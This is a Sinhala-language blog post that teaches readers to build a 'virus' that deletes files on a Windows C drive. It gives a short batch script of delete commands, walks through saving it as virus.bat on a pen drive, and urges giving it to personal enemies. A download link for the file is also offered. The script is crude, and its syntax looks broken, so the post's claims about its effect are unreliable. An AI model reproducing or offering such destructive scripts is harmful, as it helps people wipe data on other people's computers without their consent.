computer එකක C එකේ ඔක්කෝම delete කරලා දාන්න පුලුවන් virus එකක් හදමු.

 

පටන් ගන්න කලින්ම කියනවා බොහොම පරිස්සමෙන් වැඩේ කරන්න වෙනවා.ඒ වගේම මේ වැඩෙන් ඔයාගේ පරිගනකයට මොනවහරි වුනොත් ඒකට වගකියනු නොලැබේ..මම කියන විදියටම වැඩේ කරොත් ඔයාගේ PC එකට කෙලවෙන්නේ නැතුව වැඩේ කරගන්න පුලුවන්.තරහ කාරයෝ එහෙම ඉන්නවානම් මේ virus එක ඔයාට බොහොම වැදගත්.මේ වැඩෙන් කාටහරි කෙලවලා ඕං මගේ නමනම් එහෙම කියනවා නෙමේ.ඒ වගේම අනිත් අයට හිරිහැරයක් වෙන ලෙස මේ virus එක පාවිච්චි කරන්න එපා...තරහකාරයෝ ඉන්නවනම් දුන්නට කමක් නැහැ.

මේ virus එකෙන් පුලුවන් windows operating system එක තියෙන ඕනැම පරිගනකයක C එකට කෙලවලාම යන්න වැඩේ දෙන්න.ආයේ C එක Format කරලා අලුත් operating system එකක් ගහන්න ඕනේ තත්වෙකට පත්කරනවා.මේකෙන් වෙන්න C එකේ අවශ්‍යම files delete කරලා දානවා.එහෙනම් වැඩේ පටන් ගමු.

1.මුලින්ම Notepad එක Open කරගන්න.
Notepad open කරගන්න දන්නේ නැත්නම් මෙහෙම කරන්න.
 windows key+ r = run(run එක open වුනහම ඒකේ notepad කියලා type කරලා enter කරන්න)

2.මෙන්න මේ code එක type කරන්න.
             
@Echo off
Del C:\ *.* |yY

3.ඕක save කරන්න ඔයා කැමතිම නමකින්.
eg = my,note

4.ඔයාට ඕක virus එකක් විදියට කාටහරි දෙන්න ඕනේ වුනොත්.අපි හිතමු ඔයා ඔයාගේ තරහකාරයට මේ virus එක දෙන්නේ pen එකක දාලා කියලා.ඔයා save කරගත්ත notepad file එක ඒ pen drive එකට දාගන්න.pen drive එකට දාගත්තට පස්සේ ඔයා ඒ notepad file එක rename කරන්න virus.bat කියලා.

5.rename කරලා enter කරපු සැනින් එසැනින් ඔයා pen drive එක ගලවන්න(disconnect) කරන්න.නැත්නම් ඔයාගේ C එකට බබා හම්බවෙයි.

අනිත් එක්කෙනා එයගේ PC එකට connect කරපුවහම එයාගේ C එකට Sorry.com

ඔයාට වැඩේ අමාරු නම්.යට තියෙන ලින්ක් එකෙන් notepad file එක බගන්න.බයවෙන්න එපා download කරාට ඔයාගේ pc එකට මුකුත් වෙන්නේ නැහැ.හැබැයි ඒක virus.bat කියලා ඔයා ඒක rename කලොත් නම් බයවෙන්න වෙයි.මම නැවත්තත් කියනවා download කරාට කිසි අවුලක් නැහැ.

මෙතනින් ගන්න.

උඩ තියෙන හැම link එකක්ම click කරපුවම එන window එකෙ  වෙලාවක් යනවා.ඒක ඉවර වුනාම skip ad දෙන්න.



Share on Google Plus

About Sachin dewthuru

This is a short description in the author block about the author. You edit it by entering text in the "Biographical Info" field in the user admin panel.
    Blogger Comment
    Facebook Comment

0 comments:

Post a Comment

Most Popular